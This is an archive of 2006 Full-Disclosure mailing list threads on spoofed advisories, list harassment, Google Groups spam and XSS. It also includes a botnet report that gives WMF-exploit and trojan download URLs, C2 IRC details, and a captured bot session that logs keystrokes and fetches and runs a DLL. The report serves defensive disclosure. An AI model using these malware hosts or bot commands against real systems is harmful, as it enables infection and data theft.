[Advisory] | [Thu Mar 16 13:38:05 EST 2006] | Off-by-one in ISC DHCP 1. DESCRIPTION It is possible to make ISC DHCP crash by the use of malformed input. 2. WORKAROUND This advisory has no workarounds regarding the vulnerability. 3. VENDOR RESPONSE ISC DHCP had extended no explanation regarding this issue. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Advisory 2006-03-12 Gay Slut Overflow CRITICAL dismallest in Immunitysec Dave Aitel
Not to mention all the messages come through www.c0replay.net assuming that part of the headersare accurate. If you'll recall the same domain was used to spoof a message from Steven Rakick on March 4th. Seems some little kiddie in the UK (assumption warning!) is going to be paying some fines. I wouldn't exactly call it smart to slander dozens of people... and moderation has never seemed more necessary. -sb On 3/12/06, Nicob [EMAIL PROTECTED] wrote: Le dimanche 12 mars 2006 à 01:08 -0800, dismallest dismallest a écrit : APPENDIX B. - References http://bantown.com/banforge/release.rar http://bantown.com/ : Our website was recently hacked [...] and http://64.233.179.104/search?q=cache:1F21krhKFHEJ:bantown.com/banforge/ Index of /banforge Parent Directory 23-Feb-2006 22:51 - BPL.txt 20-Aug-2005 15:08 4k LJiggaboo1.0.1rc2.tgz21-Jan-2006 13:10 142k Ljflooder2.pl07-Aug-2005 05:07 5k PhpBBreg-FIXEDLOL.py 08-Aug-2005 23:11 1k banbot.pl16-Aug-2005 11:3615k fla.sh 16-Aug-2005 11:22 2k flu.shot 19-Aug-2005 11:04 3k gaffler3.tar.gz 09-Aug-2005 02:30 123k phpBBroke-0.1.tar.gz 09-Oct-2005 13:35 383k phpBBroke/ 27-Sep-2005 16:47 - phpbb_captcha.c 24-Jan-2006 03:1621k pw-lolercaust-0.2.tar.gz 10-Oct-2005 03:38 2k rsshithead.tgz Nicob ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gadievron flood
On 3/12/06, Gary Leons [EMAIL PROTECTED] wrote: Personally, I find the Gay Slut advisories a refreshing change from the crap Evron normally posts. But then, I kill filed him after his OMG I FOUND A LUNIX VIRUS thread, so maybe he's reduced the frequency of pathetic commentaries since then, I dont know. If you bothered to look at any of the headers you'd see that Gadi didn't post any of the messages. They came from c0replay.net or something rather. Hopefully some more subscribers will have kill filed him by now, and he'll get bored and go away, so at least some good may come of this spamminess. Gadi has started some interesting discussions, but feel free to keep trashing people's messages who post advisories not dealing with XSS on here, god knows sensible posts ruin this list for the kids. -sb Gary. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Advisory 2006-03-12 Gay Slut Overflow CRITICAL dismallest in Immunitysec Dave Aitel
Too bad they didn't resolve the problem more than a week ago when the first spoofed messages were sent out (only 1 made it to FD I think). Thanks for the update ad, -sb On 3/12/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 yep I have some little infos on this , the admin at c0replay showed me an .sql with a malicious script - -- Dumping data for table `advisorytype` - -- INSERT INTO `advisorytype` VALUES (1, 'Directory Transversal', 'Remote exploitation of a directory traversal vulnerability in [product] could allow attackers to overwrite or view arbitrary files with user-supplied contents.'); INSERT INTO `advisorytype` VALUES (2, 'DoS Vulnerability', 'Sending a specially crafted malformed packet to the services communication socket can create a loss of service.'); INSERT INTO `advisorytype` VALUES (3, 'Integer Overflow', '[product] incorrectly parses integer data, and this can be used to execute arbitrary code.'); INSERT INTO `advisorytype` VALUES (4, 'Heap Overflow', 'It is possible to make [product] crash or run arbitrary code by the use of malformed input.'); INSERT INTO `advisorytype` VALUES (5, 'Buffer Overflow', 'It is possible to make [product] crash or run arbitrary code by the use of malformed input.'); INSERT INTO `advisorytype` VALUES (6, 'Off-by-one', 'It is possible to make [product] crash by the use of malformed input.'); INSERT INTO `advisorytype` VALUES (7, 'Local Privilege Escalation Vulnerability', '[product] incorrectly validates user input, making privilege escalation possible.'); - -- - -- - -- Table structure for table `fdmail` - -- CREATE TABLE `fdmail` ( `id` int(10) NOT NULL auto_increment, `Name` varchar(100) NOT NULL default '', `Email` varchar(100) NOT NULL default '', PRIMARY KEY (`id`) ) TYPE=MyISAM AUTO_INCREMENT=2958 ; - -- - -- Dumping data for table `fdmail` - -- INSERT INTO `fdmail` VALUES (2078, 'Josh perrymon', '[EMAIL PROTECTED]'); INSERT INTO `fdmail` VALUES (2077, '[EMAIL PROTECTED]', '[EMAIL PROTECTED]'); INSERT INTO `fdmail` VALUES (2075, 'Dave Korn', '[EMAIL PROTECTED]'); INSERT INTO `fdmail` VALUES (2076, 'str0ke', '[EMAIL PROTECTED]'); INSERT INTO `fdmail` VALUES (2073, 'Morning Wood', '[EMAIL PROTECTED]'); INSERT INTO `fdmail` VALUES (2074, 'Bipin Gautam', '[EMAIL PROTECTED]'); etc etc etc *** Im not sure but it looks like they have been hacked through the board with an sql injection , possible private bug I dunno but I know the maintainer of this website and they aren't responsible of this. Stan Bubrouski wrote: Not to mention all the messages come through www.c0replay.net assuming that part of the headersare accurate. If you'll recall the same domain was used to spoof a message from Steven Rakick on March 4th. Seems some little kiddie in the UK (assumption warning!) is going to be paying some fines. I wouldn't exactly call it smart to slander dozens of people... and moderation has never seemed more necessary. -sb On 3/12/06, Nicob [EMAIL PROTECTED] wrote: Le dimanche 12 mars 2006 à 01:08 -0800, dismallest dismallest a écrit : APPENDIX B. - References http://bantown.com/banforge/release.rar http://bantown.com/ : Our website was recently hacked [...] and http://64.233.179.104/search?q=cache:1F21krhKFHEJ:bantown.com/banforge/ Index of /banforge Parent Directory 23-Feb-2006 22:51 - BPL.txt 20-Aug-2005 15:08 4k LJiggaboo1.0.1rc2.tgz21-Jan-2006 13:10 142k Ljflooder2.pl07-Aug-2005 05:07 5k PhpBBreg-FIXEDLOL.py 08-Aug-2005 23:11 1k banbot.pl 16-Aug-2005 11:3615k fla.sh 16-Aug-2005 11:22 2k flu.shot 19-Aug-2005 11:04 3k gaffler3.tar.gz 09-Aug-2005 02:30 123k phpBBroke-0.1.tar.gz 09-Oct-2005 13:35 383k phpBBroke/ 27-Sep-2005 16:47 - phpbb_captcha.c 24-Jan-2006 03:1621k pw-lolercaust-0.2.tar.gz 10-Oct-2005 03:38 2k rsshithead.tgz Nicob ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.1 (MingW32) iD8DBQFEFJxBFJS99fNfR+YRAj5EAJ9CSGssylC2ErrXD+VmVKxmLOOzMQCcDJwQ ESS9D2SCfNJ+phvLzenoCqQ= =eQ8x -END PGP SIGNATURE- ___ Full-Disclosure - We
Re: [Full-disclosure] For Sale: Security Vulnerability Database Company
Do you ever give up? Only n3td3v would post that his google group, which is merely an aggregation of lists like this one is a vulnerability database... it's not. -sb On 3/8/06, System Outage [EMAIL PROTECTED] wrote: Hello security community, Why would someone buy a security vulnerability database company? Theres already free security vulnerability databases out there. Try this one I recently found, you can search for anything you want http://groups.google.com/group/n3td3v and its free. system_outage -- Forwarded message -- From: Jason Bergen Date: Mar 8, 2006 11:59 AM Subject: [Full-disclosure] For Sale: Security Vulnerability Database Company To: full-disclosure@lists.grok.org.uk Apologies if this email is not appropriate for this list. We have been appointed to facilitate the sale of company which has developed and maintains a security vulnerability database, thus are looking for potential bu yers for our client. The company maintains a database of all security vulnerabilities, and the database is updated on a daily basis. The company maybe of interest to organisations who are currently licensing a vulnerability database. In addition the company has developed some software applications built upon the vulnerability database. More details about the organisation are available on request by contacting me by email at [EMAIL PROTECTED] Regards Jason Bergen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge
On 2/15/06, Jerome Athias [EMAIL PROTECTED] wrote: $50,000 for reporting BSA that your neighbor uses an illegal version of Window$ ! That is entirely inaccurate. The $5 reward with numerous strings attached is for reporting a company using multiple pirated copies of software, reporting your neighbor+ apparently yeilds no reward other than flaming crap on your doorstep and RAT written on your windows :-P -sb https://reporting.bsa.org/usa/home.aspx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge
haha wish you had I could sue you ;-) -sb On 2/15/06, str0ke [EMAIL PROTECTED] wrote: Class, I just made 50k reporting you ;) /str0ke On 2/15/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 nop totally wrong, I got 50k yesterday reporting my sister .. ;D Stan Bubrouski wrote: On 2/15/06, Jerome Athias [EMAIL PROTECTED] wrote: $50,000 for reporting BSA that your neighbor uses an illegal version of Window$ ! That is entirely inaccurate. The $5 reward with numerous strings attached is for reporting a company using multiple pirated copies of software, reporting your neighbor+ apparently yeilds no reward other than flaming crap on your doorstep and RAT written on your windows :-P -sb https://reporting.bsa.org/usa/home.aspx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ/OeLq+LRXunxpxfAQKTkxAA6rEaNbwSfOHMLVEUX8nWeci6haHkxxrG jLaQAqEEXeWiQr/qHi0hXg78bLGfOya0TnB7xj11iy9LNfwZzj7nOtLjBqM00+zW yGII5mePqteKhpHimTln3y4bP5mYn5vb4ETlqWhrZ4tyia9QqDbMlj+h+qXGAPlT gRQp2B4hAETFzsJLt9V/n2l52yGrYW6ZVWZLBjX1U+xtBQII7Xt2z1nulYT5xO2g B8aM6fRfD/h9rQspaxwmnGscEOnqiqSm5N5rudXzg68W92UyDrOJ4sQh4FMV4TdT 1hHVBpRrnN5eCtiZ7paaBhiFLwb6w6Cf59Sn8K7iyDZjpUueRFEV41pLtcjQbccj 4xRIXTt6+fCHmi6R2BT01qDJ6eCTQ/fd0WGlMCw0NXoUZqoJGUG5yyZ+wHVcqldC q5P4UnCaE2b0G9b1wiY3bUlntwyopwzjqmUbsqS57JhntI6Vq+YHzPx7kszzwQYf NEe5cPDCTfyqPIH53PziZpSS67twQX7mekC9tiDfmzfAaeiLUyLjFonm4sT58d9e gY1bX7bdnL+jCdWyrOjFajEccPTOYkc+WighGDnfW75sdcFfcIWLCaxqFnXGZPdR i8R8A3d3ooHAD9/iqTFn7IIIneQIPS43QlaYhpn/m/xf6sjkLxLSKMb1hwc0+0d9 xM4Xhsx3aAI= =ve/Z -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google creates SPAM haven
I was added to this group without permission as well. -sb On 2/11/06, Adam Laurie [EMAIL PROTECTED] wrote: I find it hard to believe that with all the resources at Google's disposal, they are unable to find technicians or project managers, designers, or whatever, that have any idea how the interweb works... Amazingly, despite years of SPAM being a huge problem, they have now created a system that allows spammers to set up mailing lists, add you to them unauthenticated, and then spam you by simply mailing the list and letting Google take care of the rest... http://groups.google.co.in/intl/en/googlegroups/about.html A couple of days ago I got the following unsolicited message: [EMAIL PROTECTED] has added you to the hackers a to z group with this message: Fed up with worms, viruses and hackers messing with your computer? Want to know how they do it? How to defend? How to fight back? You take the blue pill and the story ends Take the red pill and I'll show you how deep the rabbit hole goes, Within half an hour I started to receive posts to the group (typical script-kiddie crap). At no point did I need to send a confirmation mail or hit a URL to say I wanted to be subscribed... Google's solution to this? I can block it in My subscriptions. WTF??? So, as well as receiving unsolicited mail from Google (i.e., errr... SPAM), I'm now expected to go and subscribe to a service I have no interest in for the sole purpose of NOT receiving it Give me a frikkin break! cheers, Adam -- Adam Laurie Tel: +44 (0) 20 7605 7000 The Bunker Secure Hosting Ltd. Fax: +44 (0) 20 7605 7099 Shepherds Building http://www.thebunker.net Rockley Road London W14 0DA mailto:[EMAIL PROTECTED] UNITED KINGDOM PGP key on keyservers ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google creates SPAM haven
Does anyone know any way to not allow people's to add you to google groups or just extricate yourself from it all-together? I mean honestly its more than just a little intrusive, people constantly sign you up for groups you don't want to be in, your messages get posted to Google groups without your permission, along with your code etc... terms of service don't trump copyright laws either... -sb On 2/11/06, Stan Bubrouski [EMAIL PROTECTED] wrote: I was added to this group without permission as well. -sb On 2/11/06, Adam Laurie [EMAIL PROTECTED] wrote: I find it hard to believe that with all the resources at Google's disposal, they are unable to find technicians or project managers, designers, or whatever, that have any idea how the interweb works... Amazingly, despite years of SPAM being a huge problem, they have now created a system that allows spammers to set up mailing lists, add you to them unauthenticated, and then spam you by simply mailing the list and letting Google take care of the rest... http://groups.google.co.in/intl/en/googlegroups/about.html A couple of days ago I got the following unsolicited message: [EMAIL PROTECTED] has added you to the hackers a to z group with this message: Fed up with worms, viruses and hackers messing with your computer? Want to know how they do it? How to defend? How to fight back? You take the blue pill and the story ends Take the red pill and I'll show you how deep the rabbit hole goes, Within half an hour I started to receive posts to the group (typical script-kiddie crap). At no point did I need to send a confirmation mail or hit a URL to say I wanted to be subscribed... Google's solution to this? I can block it in My subscriptions. WTF??? So, as well as receiving unsolicited mail from Google (i.e., errr... SPAM), I'm now expected to go and subscribe to a service I have no interest in for the sole purpose of NOT receiving it Give me a frikkin break! cheers, Adam -- Adam Laurie Tel: +44 (0) 20 7605 7000 The Bunker Secure Hosting Ltd. Fax: +44 (0) 20 7605 7099 Shepherds Building http://www.thebunker.net Rockley Road London W14 0DA mailto:[EMAIL PROTECTED] UNITED KINGDOM PGP key on keyservers ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google creates SPAM haven
On 2/11/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Sat, 11 Feb 2006 12:32:43 EST, Stan Bubrouski said: you up for groups you don't want to be in, your messages get posted to Google groups without your permission, along with your code etc... Messages and code being reposted is hardly a Google-specific problem. hehe no doubt It's a potential problem *anytime* you hit that 'Send' button. Yeah but typically lists and whatnot these days require confirmation, Google just blindly subscribes you when anyone requests it, I'm assuming, since I didn't subscribe to any of the hacker or porn groups I have to keep removing myself from. Frankly if some Indian hacker group thinks of me as l33t they have no idea what they're talking about ;-) -sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Bluetooth Activesync - requesting test
On 2/9/06, Dave Korn [EMAIL PROTECTED] wrote: Stan Bubrouski wrote: Ever since Greg disagreed with me in that ZoneAlarm thread Dave and I were arguing in, Greg has been forwarding all messages I send to the list back to me. Stan, it is possible you could be being manipulated by someone who's trying to bait you and Greg into a fight by forwarding you his postings in a spoofed/forged name; that sort of thing happens quite often on this list. No check the headers they are below. As indeed do broken reflectors and autoreplybots and all sorts of non-malicious things. He's forwarding them from both addresses he has subscribed to the list. And indeed sometimes flamewars erupt and someone does bombard someone else with posts from the list. Yes and the person can unsubscribe or set rules to trash messages from people they don't like rather than filling their mailboxes like 10 year old script kiddies. Have you checked the headers to see if they're coming from the same IP addresses he usually posts from? It's worth making double sure what's actually going on. Yes I did I wouldn't have bothered posting if I didn't, I'd expect more from Greg though I'm starting to have my doubts about his competence. Hey, a how-to of tracking headers would even make for an on-topic thread! People on this list using posts to this list to harrass other contributors is on topic its called full-disclosure not full-intimidation. Here are the partial headers judge for yourself: Delivered-To: [EMAIL PROTECTED] Received: by 10.54.78.4 with SMTP id a4cs21898wrb; Wed, 8 Feb 2006 19:33:11 -0800 (PST) Received: by 10.64.148.16 with SMTP id v16mr508287qbd; Wed, 08 Feb 2006 19:33:10 -0800 (PST) Return-Path: [EMAIL PROTECTED] Received: from vscan02.westnet.com.au (vscan02.westnet.com.au [203.10.1.132]) by mx.gmail.com with ESMTP id q15si92451qbq.2006.02.08.19.33.08; Wed, 08 Feb 2006 19:33:10 -0800 (PST) Received-SPF: neutral (gmail.com: 203.10.1.132 is neither permitted nor denied by best guess record for domain of [EMAIL PROTECTED]) Received: from localhost (localhost.localdomain [127.0.0.1]) by localhost (Postfix) with ESMTP id CD1D711B456 for [EMAIL PROTECTED]; Thu, 9 Feb 2006 11:33:07 +0800 (WST) Received: from vscan02.westnet.com.au ([127.0.0.1]) by localhost (vscan02.westnet.com.au [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id 07529-14 for [EMAIL PROTECTED]; Thu, 9 Feb 2006 11:33:07 +0800 (WST) Received: from P4 (dsl-220-235-109-182.nsw.westnet.com.au [220.235.109.182]) by vscan02.westnet.com.au (Postfix) with ESMTP id F001611B94C for [EMAIL PROTECTED]; Thu, 9 Feb 2006 11:33:06 +0800 (WST) Return-Receipt-To: Greg [EMAIL PROTECTED] From: Greg [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: FW: Re: [Full-disclosure] Bluetooth Activesync - requesting test And: X-Gmail-Received: 9f257bbd2acc0b72366a3b169864544d27fde993 Delivered-To: [EMAIL PROTECTED] Received: by 10.54.78.4 with SMTP id a4cs21924wrb; Wed, 8 Feb 2006 19:34:53 -0800 (PST) Received: by 10.65.121.15 with SMTP id y15mr2057023qbm; Wed, 08 Feb 2006 19:34:49 -0800 (PST) Return-Path: [EMAIL PROTECTED] Received: from vscan03.westnet.com.au (vscan03.westnet.com.au [203.10.1.142]) by mx.gmail.com with ESMTP id q19si93451qbq.2006.02.08.19.34.48; Wed, 08 Feb 2006 19:34:49 -0800 (PST) Received-SPF: neutral (gmail.com: 203.10.1.142 is neither permitted nor denied by best guess record for domain of [EMAIL PROTECTED]) Received: from localhost (localhost.localdomain [127.0.0.1]) by localhost (Postfix) with ESMTP id CF11BB607E2 for [EMAIL PROTECTED]; Thu, 9 Feb 2006 11:34:46 +0800 (WST) Received: from vscan03.westnet.com.au ([127.0.0.1]) by localhost (vscan03.westnet.com.au [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id 20017-05-6 for [EMAIL PROTECTED]; Thu, 9 Feb 2006 11:34:46 +0800 (WST) Received: from P4 (dsl-220-235-109-182.nsw.westnet.com.au [220.235.109.182]) by vscan03.westnet.com.au (Postfix) with ESMTP id 179A6B60A61 for [EMAIL PROTECTED]; Thu, 9 Feb 2006 11:34:44 +0800 (WST) Return-Receipt-To: Greg [EMAIL PROTECTED] From: Greg [EMAIL PROTECTED] To: [EMAIL PROTECTED] Seems downright childish to me (talking about Greg not Dave, I disagree with Dave but Dave I can respect). Best Regards, Stan Bubrouski cheers, DaveK -- Can't think of a witty .sigline today ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bluetooth Activesync - requesting test
Ever since Greg disagreed with me in that ZoneAlarm thread Dave and I were arguing in, Greg has been forwarding all messages I send to the list back to me. Childish and Annoying are great ways to describe it since he could easily automatically trash my messages if he doesn't want to read them. This started on the list, and hopefully this message will help end it here. I don't want to trash anyone's messages, even Greg's because they could contain useful information. Greg stop being a jackass. -sb On 2/8/06, Greg [EMAIL PROTECTED] wrote: OK this sounds screwy but if someone has the equipment, can you test and let us all know please? A PDA I was working on that had to be Activesync'd to one computer had the PDA name John rather than the standard name that comes with the PDA. Another PDA was already working Activesync. Both were over bluetooth encrypted. The other one was named Cheryl just for info's sake. Anyway, John was a new PDA of exactly the same make and model as Cheryl (Mortein syndrome) but what I didn't know and didn't look for, initially, was that the computer had been set up by someone else to ONLY allow connections from Cheryl and no other device and it was set in non discovery mode, that is, no other bluetooth device supposed to be able to find it. When I set John up, it autosync'd for 24 hours and stopped syncing again. I went back and did a thorough look and found that Cheryl was the only one allowed to connect bluetooth to the computer but John had, anyway. So this makes me wonder - and this is what I am asking help with - is it possible that bluetooth pairing, connection in total and autosync are all at risk if the same model PDA is used even though they are set up with different PDA names and even if settings are correct and are NOT supposed to allow connection from anything else? If it is, this is a worry. Of course, the alternative is that I stuffed something up, I know but for the life of me, I cant see what it is. If data is encrypted and only paired devices that are NAMED are allowed to connect, I would have thought that meant I shouldn't have been able to set the other PDA up but I did. Thanks for any info/help. Greg. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [ Secuobs - Advisory ] Bluetooth : DoS on Sony/Ericsson cell phones
On 2/6/06, Research Infratech [EMAIL PROTECTED] wrote: SNIP [Vendor] notified now SNIP You have to admire that honesty ;-) -sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Text messaging information disclosure query
Hello, For years my cell phone has been the recipient of some pretty scary text messages which have included complete strangers' prescriptions, SS#, credit card #s, etc... Space limitations and a lack of interest in fraud have caused me to erase these messages in the past, but due to battery consumption caused by getting dozens of these at once and filling my box as of late I thought its time to speak up. The reason I get this information is extremely poor programming by 3rd party mobile phone service providers which I had never signed up for. I know the reason I have been recieving such messages (along with hundreds of other personal messages not meant for me to see), but now I'm getting more annoyed and curious. I'm wondering if others on the list could offer up some their experiences with this kind of thing as I'm currently doing a small writeup on how these companies are erasing our privacy. What I am looking for is specifics, like such and such company was spamming my phone with people's credit card orders etc... and provide a couple examples for verification (off list please, and don't send me SS# or CC# I have no interest in them). Best Regards, Stan Bubrouski ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible large botnet
Is it just me who thinks linking to a log of thousands of e-mail addresses is in very poor taste on a mirrored list? If they weren't harvested before they will be now. -sb On 1/20/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I don't necessarily think whomever was infected was infected via viewing this site: http://php.tjit.or.kr/ppp/log/sent.txt Lists a slew of email addresses which whomever could have sent bogus messages to possibly infect (l)users. On Fri, 20 Jan 2006 01:35:45 -0500 Pablo Esterban [EMAIL PROTECTED] wrote: Seems to be a botnet forming with the help of exploiting the recent wmf flaw on the following site. AFAIK malware/adware is referencing this. D O N O T C L I C K http://213.17.233.194/mediabar.wmf http://213.17.233.194/stat_s3.php http://213.17.233.194/stat.html D O N O T C L I C K This injects a trojan connecting to 219.240.142.59 on port 44234 44234/tcp open irc Unreal ircd 47292/tcp open irc Unreal ircd 47296/tcp open irc Unreal ircd 54729/tcp open irc-proxypsyBNC 2.3.1 Channel stats list around 500 bots and around 1200 connected (may or may not be accurate), however if you poke around you will find http://219.240.142.59/usage/, containing some interesting links and info about when this most likely started. The tcp stream below demos the login, and calling of http://219.240.142.59/ppp/mediax.dll. Stats for January list close to 90k hits on this particular file(!). NICK * USER plnaehe 0 0 :* :irc.foonet.com NOTICE AUTH :*** Looking up your hostname... :irc.foonet.com NOTICE AUTH :*** Found your hostname :irc.foonet.com 001 *:Welcome to the ROXnet IRC Network * :irc.foonet.com 002 *:Your host is irc.foonet.com, running version Unreal3.2.3 :irc.foonet.com 003 *:This server was created Thu Oct 13 2005 at 17:25:57 KST :irc.foonet.com 005 *SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS WATCH=128 :are supported by this server :irc.foonet.com 005 *SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beIqa,kfL,lj,psmntirRcOAQKVGCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT [EMAIL PROTECTED] EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server :irc.foonet.com 251 *:There are 1 users and 1194 invisible on 1 servers :irc.foonet.com 252 *1 :operator(s) online :irc.foonet.com 253 *201 :unknown connection(s) :irc.foonet.com 254 *10 :channels formed :irc.foonet.com 255 *:I have 1195 clients and 0 servers :irc.foonet.com 265 *:Current Local Users: 1195 Max: 5529 :irc.foonet.com 266 *:Current Global Users: 1195 Max: 1276 :irc.foonet.com 422 *:MOTD File is missing *MODE *:+iwTxd USERHOST * :irc.foonet.com 302 *:* MODE *-x+B JOIN #mrbean5 rowan PRIVMSG *:[KEYLOG]: Key logger active. USERHOST * MODE *-x+B JOIN #mrbean5 rowan USERHOST * MODE *-x+B JOIN #mrbean5 rowan :irc.foonet.com NOTICE *:BOTMOTD File not found *MODE *:-x+B * JOIN :#mrbean5 :irc.foonet.com 332 *#mrbean5 :.wipe http://219.240.142.59/ppp/mediax.dll mediax.dll 3 :irc.foonet.com 333 *#mrbean5 DDDI 1137401387 :irc.foonet.com 353 *@ #mrbean5 * :irc.foonet.com 366 *#mrbean5 :End of /NAMES list. *PRIVMSG *:[KEYLOG]: Key logger active. :irc.foonet.com 302 * :irc.foonet.com 302 * PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/mediax.dll to: mediax.dll. :irc.foonet.com 404 *#mrbean5 :You need voice (+v) (#mrbean5) PRIVMSG #mrbean5 :[DOWNLOAD]: Downloaded 214.5 KB to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll @ 71.5 KB/sec. PRIVMSG #mrbean5 :[DOWNLOAD]: Opened: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll. :irc.foonet.com 404 *#mrbean5 :You need voice (+v) (#mrbean5) :irc.foonet.com 404 *#mrbean5 :You need voice (+v) (#mrbean5) _ Don't just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkPQ7FsACgkQo8cxM8/cskpeWgCfYV8lOqt4qAqGHbXl3/YPjsjE26oA oIe+zN0P1qsDz+gfy4da+vfZ+A3y =suSR -END PGP SIGNATURE- Concerned about your privacy? Instantly send FREE secure email, no
Re: [Full-disclosure] MBT Xss vulnerability
Well I'm not going to talk about how XSS is useless because we all know it can be quite a serious problem. I think, and I don't know the guy so I can't be sure, the original dissenter to this post was pointing out that: What would you phish from a site that doesn't have any forms anyways? What would stealing a session cookie get you if the only dynamic content is a search function? I'm not saying XSS isn't important, I'm just wondering why this case is? -sb On 1/20/06, Jerome Athias [EMAIL PROTECTED] wrote: Hey guy, do you know something about XSS 1) Phishing? 2) encoded URL, UTF8...? 3) cookie steal? ... it'll not be difficult to reproduce a website and have an url difficult to understand for a basic user... sure it's harder to spoof the url in the browser... // Native.Code a écrit : What a lame vulnerability it is. If your POC redirects to another site (which is not MBT site), how someone will become victim and believe that he/she is doing business with MBT? Your post is yet another proof that FD is more and more inhibited by scipt kiddies. Get a life! - About FD: Speech is silver, but silence is gold /JA /https://www.securinfos.info/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Re: PC Firewall Choices
